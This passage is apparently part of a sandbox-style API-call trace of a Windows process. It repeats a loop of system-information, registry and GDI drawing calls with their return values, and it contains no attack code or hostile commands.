wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.779] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.779] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.779] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.779] BeginPath (hdc=0x0) returned 0 [0087.779] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.779] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.779] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.779] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.779] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.779] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.779] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.779] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.779] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6f0401d6 [0087.779] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x710401d3 [0087.779] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b7c [0087.779] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b7d [0087.779] CombineRgn (hrgnDst=0x1040b7c, hrgnSrc1=0x6f0401d6, hrgnSrc2=0x710401d3, iMode=1) returned 1 [0087.779] CombineRgn (hrgnDst=0x1040b7d, hrgnSrc1=0x6f0401d6, hrgnSrc2=0x710401d3, iMode=4) returned 2 [0087.779] CreateSolidBrush (color=0xff) returned 0x2100b7b [0087.779] CreateSolidBrush (color=0xff0000) returned 0x1100b7e [0087.779] DeleteObject (ho=0x1100b7e) returned 1 [0087.779] DeleteObject (ho=0x710401d3) returned 1 [0087.779] DeleteObject (ho=0x6f0401d6) returned 1 [0087.779] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.779] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.779] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.779] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.779] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.779] BeginPath (hdc=0x0) returned 0 [0087.779] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.779] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.779] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.779] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.779] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.779] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.779] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.779] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.780] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x720401d3 [0087.780] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x700401d6 [0087.780] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b7f [0087.780] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b80 [0087.780] CombineRgn (hrgnDst=0x1040b7f, hrgnSrc1=0x720401d3, hrgnSrc2=0x700401d6, iMode=1) returned 1 [0087.780] CombineRgn (hrgnDst=0x1040b80, hrgnSrc1=0x720401d3, hrgnSrc2=0x700401d6, iMode=4) returned 2 [0087.780] CreateSolidBrush (color=0xff) returned 0x2100b7e [0087.780] CreateSolidBrush (color=0xff0000) returned 0x1100b81 [0087.780] DeleteObject (ho=0x1100b81) returned 1 [0087.780] DeleteObject (ho=0x700401d6) returned 1 [0087.780] DeleteObject (ho=0x720401d3) returned 1 [0087.780] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.780] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.780] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.780] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.780] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.780] BeginPath (hdc=0x0) returned 0 [0087.780] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.780] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.780] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.780] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.780] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.780] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.780] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.780] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.780] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x710401d6 [0087.780] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x730401d3 [0087.780] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b82 [0087.780] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b83 [0087.780] CombineRgn (hrgnDst=0x1040b82, hrgnSrc1=0x710401d6, hrgnSrc2=0x730401d3, iMode=1) returned 1 [0087.780] CombineRgn (hrgnDst=0x1040b83, hrgnSrc1=0x710401d6, hrgnSrc2=0x730401d3, iMode=4) returned 2 [0087.780] CreateSolidBrush (color=0xff) returned 0x2100b81 [0087.780] CreateSolidBrush (color=0xff0000) returned 0x1100b84 [0087.780] DeleteObject (ho=0x1100b84) returned 1 [0087.780] DeleteObject (ho=0x730401d3) returned 1 [0087.780] DeleteObject (ho=0x710401d6) returned 1 [0087.780] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.780] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.781] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.781] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.781] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.781] BeginPath (hdc=0x0) returned 0 [0087.781] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.781] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.781] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.781] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.781] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.781] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.781] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.781] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.781] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x740401d3 [0087.781] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x720401d6 [0087.781] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b85 [0087.781] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b86 [0087.781] CombineRgn (hrgnDst=0x1040b85, hrgnSrc1=0x740401d3, hrgnSrc2=0x720401d6, iMode=1) returned 1 [0087.781] CombineRgn (hrgnDst=0x1040b86, hrgnSrc1=0x740401d3, hrgnSrc2=0x720401d6, iMode=4) returned 2 [0087.781] CreateSolidBrush (color=0xff) returned 0x2100b84 [0087.781] CreateSolidBrush (color=0xff0000) returned 0x1100b87 [0087.781] DeleteObject (ho=0x1100b87) returned 1 [0087.781] DeleteObject (ho=0x720401d6) returned 1 [0087.781] DeleteObject (ho=0x740401d3) returned 1 [0087.781] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.781] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.781] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.781] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.781] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.781] BeginPath (hdc=0x0) returned 0 [0087.781] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.781] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.781] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.781] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.781] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.781] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.781] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.781] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.782] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x730401d6 [0087.782] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x750401d3 [0087.782] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b88 [0087.782] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b89 [0087.782] CombineRgn (hrgnDst=0x1040b88, hrgnSrc1=0x730401d6, hrgnSrc2=0x750401d3, iMode=1) returned 1 [0087.782] CombineRgn (hrgnDst=0x1040b89, hrgnSrc1=0x730401d6, hrgnSrc2=0x750401d3, iMode=4) returned 2 [0087.782] CreateSolidBrush (color=0xff) returned 0x2100b87 [0087.782] CreateSolidBrush (color=0xff0000) returned 0x1100b8a [0087.782] DeleteObject (ho=0x1100b8a) returned 1 [0087.782] DeleteObject (ho=0x750401d3) returned 1 [0087.782] DeleteObject (ho=0x730401d6) returned 1 [0087.782] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.782] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.782] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.782] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.782] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.782] BeginPath (hdc=0x0) returned 0 [0087.782] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.782] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.782] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.782] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.782] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.782] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.782] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.782] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.782] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x760401d3 [0087.782] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x740401d6 [0087.782] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b8b [0087.782] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b8c [0087.782] CombineRgn (hrgnDst=0x1040b8b, hrgnSrc1=0x760401d3, hrgnSrc2=0x740401d6, iMode=1) returned 1 [0087.782] CombineRgn (hrgnDst=0x1040b8c, hrgnSrc1=0x760401d3, hrgnSrc2=0x740401d6, iMode=4) returned 2 [0087.782] CreateSolidBrush (color=0xff) returned 0x2100b8a [0087.782] CreateSolidBrush (color=0xff0000) returned 0x1100b8d [0087.782] DeleteObject (ho=0x1100b8d) returned 1 [0087.782] DeleteObject (ho=0x740401d6) returned 1 [0087.782] DeleteObject (ho=0x760401d3) returned 1 [0087.782] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.782] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.782] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.783] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.783] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.783] BeginPath (hdc=0x0) returned 0 [0087.783] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.783] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.783] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.783] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.783] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.783] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.783] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.783] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.783] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x750401d6 [0087.783] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x770401d3 [0087.783] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b8e [0087.783] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b8f [0087.783] CombineRgn (hrgnDst=0x1040b8e, hrgnSrc1=0x750401d6, hrgnSrc2=0x770401d3, iMode=1) returned 1 [0087.783] CombineRgn (hrgnDst=0x1040b8f, hrgnSrc1=0x750401d6, hrgnSrc2=0x770401d3, iMode=4) returned 2 [0087.783] CreateSolidBrush (color=0xff) returned 0x2100b8d [0087.783] CreateSolidBrush (color=0xff0000) returned 0x1100b90 [0087.783] DeleteObject (ho=0x1100b90) returned 1 [0087.783] DeleteObject (ho=0x770401d3) returned 1 [0087.783] DeleteObject (ho=0x750401d6) returned 1 [0087.783] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.783] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.783] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.783] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.783] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.783] BeginPath (hdc=0x0) returned 0 [0087.783] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.783] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.783] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.783] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.783] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.783] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.783] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.783] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.783] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x780401d3 [0087.783] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x760401d6 [0087.784] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b91 [0087.784] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b92 [0087.784] CombineRgn (hrgnDst=0x1040b91, hrgnSrc1=0x780401d3, hrgnSrc2=0x760401d6, iMode=1) returned 1 [0087.784] CombineRgn (hrgnDst=0x1040b92, hrgnSrc1=0x780401d3, hrgnSrc2=0x760401d6, iMode=4) returned 2 [0087.784] CreateSolidBrush (color=0xff) returned 0x2100b90 [0087.784] CreateSolidBrush (color=0xff0000) returned 0x1100b93 [0087.784] DeleteObject (ho=0x1100b93) returned 1 [0087.784] DeleteObject (ho=0x760401d6) returned 1 [0087.784] DeleteObject (ho=0x780401d3) returned 1 [0087.784] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.784] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.784] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.784] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.784] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.784] BeginPath (hdc=0x0) returned 0 [0087.784] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.784] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.784] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.784] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.784] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.784] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.784] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.784] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x770401d6 [0087.784] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x790401d3 [0087.784] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b94 [0087.784] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b95 [0087.784] CombineRgn (hrgnDst=0x1040b94, hrgnSrc1=0x770401d6, hrgnSrc2=0x790401d3, iMode=1) returned 1 [0087.784] CombineRgn (hrgnDst=0x1040b95, hrgnSrc1=0x770401d6, hrgnSrc2=0x790401d3, iMode=4) returned 2 [0087.784] CreateSolidBrush (color=0xff) returned 0x2100b93 [0087.784] CreateSolidBrush (color=0xff0000) returned 0x1100b96 [0087.784] DeleteObject (ho=0x1100b96) returned 1 [0087.784] DeleteObject (ho=0x790401d3) returned 1 [0087.784] DeleteObject (ho=0x770401d6) returned 1 [0087.784] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.784] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.784] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.784] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.784] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.784] BeginPath (hdc=0x0) returned 0 [0087.784] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.785] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.785] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.785] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.785] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.785] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.785] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.785] 